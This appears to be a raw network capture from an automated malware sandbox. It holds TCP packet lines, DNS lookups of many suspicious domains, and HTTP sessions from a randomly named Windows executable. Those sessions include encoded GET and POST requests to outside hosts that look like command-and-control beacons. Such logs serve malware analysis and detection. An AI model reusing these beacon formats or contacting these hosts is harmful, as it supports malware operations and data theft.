                                                                                                                                                                                                                                              Oct 24, 2024 15:19:22.764652014 CEST805000884.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:22.764734030 CEST5000880192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:22.776475906 CEST5000880192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:22.781943083 CEST805000884.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:23.578150988 CEST805000884.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:23.579946995 CEST5000880192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:24.289025068 CEST5000880192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:24.295897961 CEST805000884.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:25.305865049 CEST5000980192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:25.311707973 CEST805000984.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:25.316982985 CEST5000980192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:25.327523947 CEST5000980192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:25.333070993 CEST805000984.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:25.333081007 CEST805000984.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:26.139936924 CEST805000984.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:26.144998074 CEST5000980192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:26.834323883 CEST5000980192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:26.839775085 CEST805000984.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:27.852999926 CEST5001080192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:27.858452082 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:27.861042976 CEST5001080192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:27.867914915 CEST5001080192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:27.873256922 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733262062 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733275890 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733319998 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733330965 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733340979 CEST5001080192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733342886 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733352900 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733366013 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733375072 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733386993 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733443022 CEST5001080192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733459949 CEST5001080192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733715057 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733725071 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733761072 CEST5001080192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.984281063 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.984385967 CEST5001080192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.984857082 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.984908104 CEST5001080192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.985476017 CEST5001080192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.990782022 CEST805001084.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:34.013717890 CEST5001180192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:34.019210100 CEST80500113.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:12.019087076 CEST5002280192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:12.024568081 CEST805002284.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.043850899 CEST5002380192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.049238920 CEST80500233.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.049312115 CEST5002380192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.070478916 CEST5002380192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.075911045 CEST80500233.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.684076071 CEST80500233.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.685266972 CEST5002380192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:18.584408998 CEST5002380192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:18.589822054 CEST80500233.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:19.602773905 CEST5002480192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:19.608226061 CEST80500243.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:19.611624002 CEST5002480192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:19.623116016 CEST5002480192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:19.628669024 CEST80500243.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:20.242175102 CEST80500243.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:20.245208025 CEST5002480192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:21.131165028 CEST5002480192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:21.136693001 CEST80500243.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.149925947 CEST5002580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.156754017 CEST80500253.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.156924963 CEST5002580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.168350935 CEST5002580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.173801899 CEST80500253.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.173837900 CEST80500253.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.794642925 CEST80500253.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.794697046 CEST5002580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:23.679337025 CEST5002580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:23.684798956 CEST80500253.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:24.696803093 CEST5002680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:24.702414036 CEST80500263.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:24.702501059 CEST5002680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:24.710629940 CEST5002680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:24.716079950 CEST80500263.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:25.337759972 CEST80500263.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:25.338737965 CEST80500263.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:25.338793039 CEST5002680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:25.340899944 CEST5002680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:25.346215010 CEST80500263.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.633069992 CEST5002780192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.638619900 CEST8050027129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.638700962 CEST5002780192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.652751923 CEST5002780192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.658232927 CEST8050027129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:31.602010965 CEST8050027129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:31.649128914 CEST5002780192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:31.782744884 CEST8050027129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:31.785181046 CEST5002780192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:32.162771940 CEST5002780192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:33.181808949 CEST5002880192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:33.187463045 CEST8050028129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:33.187553883 CEST5002880192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:33.201466084 CEST5002880192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:33.207055092 CEST8050028129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:34.162050962 CEST8050028129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:34.211361885 CEST5002880192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:34.349688053 CEST8050028129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:34.351274967 CEST5002880192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:34.709332943 CEST5002880192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:35.728142023 CEST5002980192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:35.734914064 CEST8050029129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:35.737302065 CEST5002980192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:35.748178959 CEST5002980192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:35.755116940 CEST8050029129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:35.756756067 CEST8050029129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:36.713831902 CEST8050029129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:36.756154060 CEST5002980192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:36.903320074 CEST8050029129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:36.903381109 CEST5002980192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:37.256253958 CEST5002980192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:38.274858952 CEST5003080192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:38.281166077 CEST8050030129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:38.284230947 CEST5003080192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:38.291840076 CEST5003080192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:38.297527075 CEST8050030129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:39.252938032 CEST8050030129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:39.303019047 CEST5003080192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:39.441688061 CEST8050030129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:39.441787958 CEST5003080192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:39.443341017 CEST5003080192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:39.448689938 CEST8050030129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.469130993 CEST5003180192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.474471092 CEST8050031213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.474594116 CEST5003180192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.486295938 CEST5003180192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.491750002 CEST8050031213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:45.318584919 CEST8050031213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:45.365531921 CEST5003180192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:45.442670107 CEST8050031213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:45.442728043 CEST5003180192.168.2.5213.249.67.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:48.978600979 CEST53516551.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:03.275454044 CEST5761053192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:03.338252068 CEST53576101.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.027053118 CEST6531853192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.039882898 CEST53653181.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.357108116 CEST5870853192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.629791021 CEST53587081.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.447115898 CEST5700853192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.466593981 CEST53570081.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.105468988 CEST5177053192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.128691912 CEST53517701.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 24, 2024 15:17:32.984894037 CEST | 192.168.2.5 | 1.1.1.1 | 0x7597 | Standard query (0) | www.dxfwrc2h.sbs | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:17:49.961872101 CEST | 192.168.2.5 | 1.1.1.1 | 0xfc23 | Standard query (0) | www.nieuws-july202491.sbs | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:18:03.337460995 CEST | 192.168.2.5 | 1.1.1.1 | 0xac32 | Standard query (0) | www.putizhong.homes | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:18:16.870012045 CEST | 192.168.2.5 | 1.1.1.1 | 0xcd5a | Standard query (0) | www.coba168.info | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:18:31.462186098 CEST | 192.168.2.5 | 1.1.1.1 | 0xb1d3 | Standard query (0) | www.everyone.golf | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:18:44.781260014 CEST | 192.168.2.5 | 1.1.1.1 | 0xf02a | Standard query (0) | www.royapop.online | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:18:58.260027885 CEST | 192.168.2.5 | 1.1.1.1 | 0x465c | Standard query (0) | www.jy58gdwf7t.skin | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:19:06.354254007 CEST | 192.168.2.5 | 1.1.1.1 | 0x41ce | Standard query (0) | www.b-ambu.com | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:19:20.150219917 CEST | 192.168.2.5 | 1.1.1.1 | 0x9280 | Standard query (0) | www.livpure-grab.online | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:19:33.995348930 CEST | 192.168.2.5 | 1.1.1.1 | 0xdc27 | Standard query (0) | www.bandukchi.com | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:19:48.212110996 CEST | 192.168.2.5 | 1.1.1.1 | 0x286 | Standard query (0) | www.mcse.top | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:20:03.275454044 CEST | 192.168.2.5 | 1.1.1.1 | 0xcc55 | Standard query (0) | www.voidzero.tech | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:20:17.027053118 CEST | 192.168.2.5 | 1.1.1.1 | 0x7ba9 | Standard query (0) | www.huwin.club | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:20:30.357108116 CEST | 192.168.2.5 | 1.1.1.1 | 0x3339 | Standard query (0) | www.xueerr.xyz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:20:44.447115898 CEST | 192.168.2.5 | 1.1.1.1 | 0x25cf | Standard query (0) | www.onlineblikje.online | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:20:58.105468988 CEST | 192.168.2.5 | 1.1.1.1 | 0x698a | Standard query (0) | www.rtpsilva4d.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 24, 2024 15:17:33.734946966 CEST | 1.1.1.1 | 192.168.2.5 | 0x7597 | No error (0) | www.dxfwrc2h.sbs | b1-3-r11-gmhudx.t9d2quy5.shop | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:17:33.734946966 CEST | 1.1.1.1 | 192.168.2.5 | 0x7597 | No error (0) | b1-3-r11-gmhudx.t9d2quy5.shop | b1-3-r11.t9d2quy5.shop | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:17:33.734946966 CEST | 1.1.1.1 | 192.168.2.5 | 0x7597 | No error (0) | b1-3-r11.t9d2quy5.shop | b1-3-r111-s65psj.8uqm5xgy.shop | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:17:33.734946966 CEST | 1.1.1.1 | 192.168.2.5 | 0x7597 | No error (0) | b1-3-r111-s65psj.8uqm5xgy.shop | b1-3-r11-nff52.alicloudddos.top | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:17:33.734946966 CEST | 1.1.1.1 | 192.168.2.5 | 0x7597 | No error (0) | b1-3-r11-nff52.alicloudddos.top | b1-3-r111-s65psj.alicloudddos.top | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:17:33.734946966 CEST | 1.1.1.1 | 192.168.2.5 | 0x7597 | No error (0) | b1-3-r111-s65psj.alicloudddos.top | b1-3-r111-55g56.kunlundns.top | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:17:33.734946966 CEST | 1.1.1.1 | 192.168.2.5 | 0x7597 | No error (0) | b1-3-r111-55g56.kunlundns.top | b1-3-r111.kunlundns.top | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:17:33.734946966 CEST | 1.1.1.1 | 192.168.2.5 | 0x7597 | No error (0) | b1-3-r111.kunlundns.top | | 129.226.56.200 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:17:49.976183891 CEST | 1.1.1.1 | 192.168.2.5 | 0xfc23 | No error (0) | www.nieuws-july202491.sbs | nieuws-july202491.sbs | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:17:49.976183891 CEST | 1.1.1.1 | 192.168.2.5 | 0xfc23 | No error (0) | nieuws-july202491.sbs | | 162.0.215.33 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:18:03.355448008 CEST | 1.1.1.1 | 192.168.2.5 | 0xac32 | No error (0) | www.putizhong.homes | | 154.7.176.67 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:18:16.896651983 CEST | 1.1.1.1 | 192.168.2.5 | 0xcd5a | No error (0) | www.coba168.info | coba168.info | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:18:16.896651983 CEST | 1.1.1.1 | 192.168.2.5 | 0xcd5a | No error (0) | coba168.info | | 118.139.178.37 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:18:31.481498003 CEST | 1.1.1.1 | 192.168.2.5 | 0xb1d3 | No error (0) | www.everyone.golf | everyone.golf | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:18:31.481498003 CEST | 1.1.1.1 | 192.168.2.5 | 0xb1d3 | No error (0) | everyone.golf | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:18:31.481498003 CEST | 1.1.1.1 | 192.168.2.5 | 0xb1d3 | No error (0) | everyone.golf | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:18:44.810873032 CEST | 1.1.1.1 | 192.168.2.5 | 0xf02a | No error (0) | www.royapop.online | | 209.74.64.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:18:58.278000116 CEST | 1.1.1.1 | 192.168.2.5 | 0x465c | Name error (3) | www.jy58gdwf7t.skin | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:19:06.556608915 CEST | 1.1.1.1 | 192.168.2.5 | 0x41ce | No error (0) | www.b-ambu.com | b-ambu.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:19:06.556608915 CEST | 1.1.1.1 | 192.168.2.5 | 0x41ce | No error (0) | b-ambu.com | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:19:20.198770046 CEST | 1.1.1.1 | 192.168.2.5 | 0x9280 | No error (0) | www.livpure-grab.online | livpure-grab.online | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:19:20.198770046 CEST | 1.1.1.1 | 192.168.2.5 | 0x9280 | No error (0) | livpure-grab.online | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:19:34.010365963 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc27 | No error (0) | www.bandukchi.com | bandukchi.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:19:34.010365963 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc27 | No error (0) | bandukchi.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:19:34.010365963 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc27 | No error (0) | bandukchi.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:19:48.978600979 CEST | 1.1.1.1 | 192.168.2.5 | 0x286 | No error (0) | www.mcse.top | | 154.9.228.56 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:20:03.338252068 CEST | 1.1.1.1 | 192.168.2.5 | 0xcc55 | No error (0) | www.voidzero.tech | voidzero.tech | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:20:03.338252068 CEST | 1.1.1.1 | 192.168.2.5 | 0xcc55 | No error (0) | voidzero.tech | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:20:17.039882898 CEST | 1.1.1.1 | 192.168.2.5 | 0x7ba9 | No error (0) | www.huwin.club | huwin.club | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:20:17.039882898 CEST | 1.1.1.1 | 192.168.2.5 | 0x7ba9 | No error (0) | huwin.club | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:20:17.039882898 CEST | 1.1.1.1 | 192.168.2.5 | 0x7ba9 | No error (0) | huwin.club | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:20:30.629791021 CEST | 1.1.1.1 | 192.168.2.5 | 0x3339 | No error (0) | www.xueerr.xyz | | 129.226.176.90 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:20:44.466593981 CEST | 1.1.1.1 | 192.168.2.5 | 0x25cf | No error (0) | www.onlineblikje.online | | 213.249.67.10 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:20:58.128691912 CEST | 1.1.1.1 | 192.168.2.5 | 0x698a | No error (0) | www.rtpsilva4d.click | rtpsilva4d.click | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:20:58.128691912 CEST | 1.1.1.1 | 192.168.2.5 | 0x698a | No error (0) | rtpsilva4d.click | | 67.223.117.169 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49787 | 129.226.56.200 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:17:33.753350019 CEST | 482 | OUT | GET /28kl/?7Bohe=ZkKAB6qSK6F5HsjBEzwiMizWOSJwTbSi5er0Koahj7mpnIIYqRoLKzbDk71u2k+MO6tmUyIoyOO9F/o0RCIBFZEb81/8BfbGrnNiAiZNS4xvfhhZvRECGHuLoGBIxYjXhw==&vD=h0e85v HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.dxfwrc2h.sbs
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:17:34.701767921 CEST | 306 | IN | HTTP/1.1 404 Not Found
Server: Tengine
Date: Thu, 24 Oct 2024 13:17:34 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 146
Connection: close
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49866 | 162.0.215.33 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:17:49.999325991 CEST | 767 | OUT | POST /4bpc/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.nieuws-july202491.sbs/4bpc/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=b40V17h4HrXyy9mxjCS5E4OfpGuWhWgHEK/2JnCX99O60K/W5ICWFOoODjhfbX5YbvLJLKDn2zuOFTqZii2QamCe87yPThv9KykjxtEi4+xF1fdZZN1hxvUayFPUpinvD/YstEtMLwXFuKdcNTTgOqNhvGtRmjbsib11sNW5XWuZwr2I9aaHifXs0QwUWt6Ud9j9aMc=
